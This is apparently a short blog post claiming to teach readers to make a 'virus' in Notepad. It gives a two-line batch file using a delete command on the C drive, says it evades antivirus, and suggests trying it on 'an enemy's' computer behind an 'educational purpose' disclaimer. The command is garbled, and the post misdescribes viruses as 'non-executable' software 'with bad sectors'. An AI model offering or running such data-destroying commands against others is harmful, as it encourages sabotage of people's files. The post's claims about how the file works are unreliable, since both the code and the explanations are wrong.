How to Make a Virus With Notepad

How to Make a Virus With Notepad

Today, I will show you How to Make a Virus With Notepad. Yes! a Virus, it can be dangerous if you take it lightly. You need to create a Virus file by using the code, I am providing you in the post.

In computers, a virus is a program or programming code that replicates by being copied or initiating its copying to another program, computer boot sector or document.

The virus can be transmitted as attachments to an email note or in a downloaded file, or be present on a diskette or CD.

In simple words, Virus is non-executable malicious software with bad sectors, and if you trying to execute virus file, this will definitely harm your computer.

How to Make a Virus With Notepad

So in this post, we’re talking about How to Make a Virus With Notepad on your laptop and it will also can’t be detected by any antivirus.

Related Post:

NOTE: THIS POST IS ONLY FOR EDUCATIONAL PURPOSE ONLY AND WE’RE NOT RESPONSIBLE FOR ANYTHING YOU WANT TO DO RELATED THIS POST.

 What this virus can do?
 

This virus will delete the C drive completely so be careful and we request you to use this trick for the purpose of knowledge and if you have an enemy just try on his computer.

This virus created by using batch programming so it doesn’t modify the code we’re providing below.
 
How to Create a VIRUS?

1.       Open Notepad and copy the below code into it.

@Echo off

Del C:*.* ly

Save this file as virus.bat (you can change the name what you like but .bat is necessary).  Now running this file can delete your all data from C drive.

WARNING: Please do not try to run on your own computer or else it will delete all the content of your C drive.

This virus only works for windows, for other operating systems this is just a waste file.

I hope you like this post, or having any problem related to this post so feel free to write in a comment below about this post and please share if you like, See the sharing button is right below.

2 thoughts on “How to Make a Virus With Notepad

Leave a Reply

Your email address will not be published. Required fields are marked *